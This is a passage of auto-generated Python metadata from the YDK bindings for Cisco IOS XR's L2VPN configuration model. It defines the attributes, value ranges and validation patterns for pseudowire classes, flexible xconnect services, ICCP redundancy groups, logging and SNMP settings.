'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the pseudowire class
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-disable-delay', REFERENCE_CLASS, 'BackupDisableDelay' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.BackupDisableDelay',
[], [],
''' Back Up Pseudowire class
''',
'backup_disable_delay',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire class
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tpv3-encapsulation', REFERENCE_CLASS, 'L2Tpv3Encapsulation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation',
[], [],
''' L2TPv3 encapsulation
''',
'l2tpv3_encapsulation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mac-withdraw', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable backup MAC withdraw
''',
'mac_withdraw',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mpls-encapsulation', REFERENCE_CLASS, 'MplsEncapsulation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation',
[], [],
''' MPLS encapsulation
''',
'mpls_encapsulation',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-class',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses',
False,
[
_MetaInfoClassMember('pseudowire-class', REFERENCE_LIST, 'PseudowireClass' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass',
[], [],
''' Pseudowire class
''',
'pseudowire_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-classes',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits.VlanUnawareFxcAttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits.VlanUnawareFxcAttachmentCircuit',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the attachment circuit interface
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-fxc-attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits',
False,
[
_MetaInfoClassMember('vlan-unaware-fxc-attachment-circuit', REFERENCE_LIST, 'VlanUnawareFxcAttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits.VlanUnawareFxcAttachmentCircuit',
[], [],
''' Attachment circuit interface
''',
'vlan_unaware_fxc_attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-fxc-attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns.VlanUnawareFxcPseudowireEvpn' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns.VlanUnawareFxcPseudowireEvpn',
False,
[
_MetaInfoClassMember('acid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' AC ID
''',
'acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '65534')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-fxc-pseudowire-evpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns',
False,
[
_MetaInfoClassMember('vlan-unaware-fxc-pseudowire-evpn', REFERENCE_LIST, 'VlanUnawareFxcPseudowireEvpn' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns.VlanUnawareFxcPseudowireEvpn',
[], [],
''' EVPN FXC Service Configuration
''',
'vlan_unaware_fxc_pseudowire_evpn',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-fxc-pseudowire-evpns',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 23)], [],
''' Name of the Flexible XConnect Service
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('vlan-unaware-fxc-attachment-circuits', REFERENCE_CLASS, 'VlanUnawareFxcAttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits',
[], [],
''' List of attachment circuits
''',
'vlan_unaware_fxc_attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vlan-unaware-fxc-pseudowire-evpns', REFERENCE_CLASS, 'VlanUnawareFxcPseudowireEvpns' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns',
[], [],
''' List of EVPN Services
''',
'vlan_unaware_fxc_pseudowire_evpns',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-flexible-xconnect-service',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices',
False,
[
_MetaInfoClassMember('vlan-unaware-flexible-xconnect-service', REFERENCE_LIST, 'VlanUnawareFlexibleXconnectService' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService',
[], [],
''' Flexible XConnect Service
''',
'vlan_unaware_flexible_xconnect_service',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-flexible-xconnect-services',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable',
False,
[
_MetaInfoClassMember('vlan-unaware-flexible-xconnect-services', REFERENCE_CLASS, 'VlanUnawareFlexibleXconnectServices' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices',
[], [],
''' List of Vlan-Unaware Flexible XConnect
Services
''',
'vlan_unaware_flexible_xconnect_services',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flexible-xconnect-service-table',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces.IccpInterface' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces.IccpInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Interface name
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('mac-flush-tcn', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable STP-TCN MAC flushing
''',
'mac_flush_tcn',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('primary-vlan-range', ATTRIBUTE, 'str' , None, None,
[], [],
''' Primary VLAN range, in the form of 1-3,5
,8-11
''',
'primary_vlan_range',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('recovery-delay', ATTRIBUTE, 'int' , None, None,
[('30', '3600')], [],
''' Failure clear recovery delay
''',
'recovery_delay',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('secondary-vlan-range', ATTRIBUTE, 'str' , None, None,
[], [],
''' Secondary VLAN range, in the form of 1-3,5
,8-11
''',
'secondary_vlan_range',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'iccp-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces',
False,
[
_MetaInfoClassMember('iccp-interface', REFERENCE_LIST, 'IccpInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces.IccpInterface',
[], [],
''' Interface name
''',
'iccp_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'iccp-interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup',
False,
[
_MetaInfoClassMember('group-id', ATTRIBUTE, 'int' , None, None,
[('-2147483648', '2147483647')], [],
''' Group ID
''',
'group_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('iccp-interfaces', REFERENCE_CLASS, 'IccpInterfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces',
[], [],
''' List of interfaces
''',
'iccp_interfaces',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('multi-homing-node-id', ATTRIBUTE, 'int' , None, None,
[('0', '254')], [],
''' ICCP-based service multi-homing node ID
''',
'multi_homing_node_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'iccp-redundancy-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy.IccpRedundancyGroups' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy.IccpRedundancyGroups',
False,
[
_MetaInfoClassMember('iccp-redundancy-group', REFERENCE_LIST, 'IccpRedundancyGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup',
[], [],
''' ICCP Redundancy group
''',
'iccp_redundancy_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'iccp-redundancy-groups',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.Redundancy' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.Redundancy',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable redundancy groups
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('iccp-redundancy-groups', REFERENCE_CLASS, 'IccpRedundancyGroups' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy.IccpRedundancyGroups',
[], [],
''' List of Inter-Chassis Communication Protocol
redundancy groups
''',
'iccp_redundancy_groups',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'redundancy',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database',
False,
[
_MetaInfoClassMember('bridge-domain-groups', REFERENCE_CLASS, 'BridgeDomainGroups' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups',
[], [],
''' List of bridge groups
''',
'bridge_domain_groups',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flexible-xconnect-service-table', REFERENCE_CLASS, 'FlexibleXconnectServiceTable' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable',
[], [],
''' List of Flexible XConnect Services
''',
'flexible_xconnect_service_table',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('g8032-rings', REFERENCE_CLASS, 'G8032Rings' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings',
[], [],
''' List of G8032 Ring
''',
'g8032_rings',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-classes', REFERENCE_CLASS, 'PseudowireClasses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses',
[], [],
''' List of pseudowire classes
''',
'pseudowire_classes',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('redundancy', REFERENCE_CLASS, 'Redundancy' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.Redundancy',
[], [],
''' Redundancy groups
''',
'redundancy',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('xconnect-groups', REFERENCE_CLASS, 'XconnectGroups' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups',
[], [],
''' List of xconnect groups
''',
'xconnect_groups',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'database',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Pbb' : {
'meta_info' : _MetaInfoClass('L2Vpn.Pbb',
False,
[
_MetaInfoClassMember('backbone-source-mac', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Backbone Source MAC
''',
'backbone_source_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.AutoDiscovery.BgpSignaling' : {
'meta_info' : _MetaInfoClass('L2Vpn.AutoDiscovery.BgpSignaling',
False,
[
_MetaInfoClassMember('mtu-mismatch-ignore', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Ignore MTU mismatch for auto-discovered
pseudowires
''',
'mtu_mismatch_ignore',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bgp-signaling',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.AutoDiscovery' : {
'meta_info' : _MetaInfoClass('L2Vpn.AutoDiscovery',
False,
[
_MetaInfoClassMember('bgp-signaling', REFERENCE_CLASS, 'BgpSignaling' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.AutoDiscovery.BgpSignaling',
[], [],
''' Global bgp signaling attributes
''',
'bgp_signaling',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Utility.Logging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Utility.Logging',
False,
[
_MetaInfoClassMember('bridge-domain-state-change', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Bridge Domain state change logging
''',
'bridge_domain_state_change',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('nsr-state-change', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Non Stop Routing state change logging
''',
'nsr_state_change',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-state-change', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire state change logging
''',
'pseudowire_state_change',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pwhe-replication-state-change', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable PW-HE Replication state change logging
''',
'pwhe_replication_state_change',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable VFI state change logging
''',
'vfi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'logging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Utility' : {
'meta_info' : _MetaInfoClass('L2Vpn.Utility',
False,
[
_MetaInfoClassMember('logging', REFERENCE_CLASS, 'Logging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Utility.Logging',
[], [],
''' L2VPN logging utility
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'utility',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp.Mib.MibInterface.Format' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp.Mib.MibInterface.Format',
False,
[
_MetaInfoClassMember('external-interface-format', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Set MIB interface name output in slash
format (/)
''',
'external_interface_format',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'format',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp.Mib.MibInterface' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp.Mib.MibInterface',
False,
[
_MetaInfoClassMember('format', REFERENCE_CLASS, 'Format' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp.Mib.MibInterface.Format',
[], [],
''' MIB interface name output format
''',
'format',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mib-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp.Mib.MibPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp.Mib.MibPseudowire',
False,
[
_MetaInfoClassMember('statistics', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire statistics in MIB output
''',
'statistics',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mib-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp.Mib' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp.Mib',
False,
[
_MetaInfoClassMember('mib-interface', REFERENCE_CLASS, 'MibInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp.Mib.MibInterface',
[], [],
''' Interface related configuration for MIB
''',
'mib_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mib-pseudowire', REFERENCE_CLASS, 'MibPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp.Mib.MibPseudowire',
[], [],
''' Pseudowire related configuration for MIB
''',
'mib_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mib',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Snmp' : {
'meta_info' : _MetaInfoClass('L2Vpn.Snmp',
False,
[
_MetaInfoClassMember('mib', REFERENCE_CLASS, 'Mib' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Snmp.Mib',
[], [],
''' MIB related configuration
''',
'mib',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'snmp',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn' : {
'meta_info' : _MetaInfoClass('L2Vpn',
False,
[
_MetaInfoClassMember('auto-discovery', REFERENCE_CLASS, 'AutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.AutoDiscovery',
[], [],
''' Global auto-discovery attributes
''',
'auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('capability', REFERENCE_ENUM_CLASS, 'L2VpnCapabilityModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnCapabilityModeEnum',
[], [],
''' L2VPN Capability Mode
''',
'capability',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('database', REFERENCE_CLASS, 'Database' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database',
[], [],
''' L2VPN databases
''',
'database',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable L2VPN feature
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2vpn-router-id', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Global L2VPN Router ID
''',
'l2vpn_router_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('load-balance', REFERENCE_ENUM_CLASS, 'LoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'LoadBalanceEnum',
[], [],
''' Enable flow load balancing on l2vpn bridges
''',
'load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mspw-description', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' MS-PW global description
''',
'mspw_description',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mtu-mismatch-ignore', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Ignore MTU Mismatch for XCs
''',
'mtu_mismatch_ignore',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('neighbor', REFERENCE_CLASS, 'Neighbor' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Neighbor',
[], [],
''' L2VPN neighbor submode
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('nsr', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Non-Stop Routing
''',
'nsr',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb', REFERENCE_CLASS, 'Pbb' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Pbb',
[], [],
''' L2VPN PBB Global
''',
'pbb',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-grouping', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable PW grouping
''',
'pw_grouping',
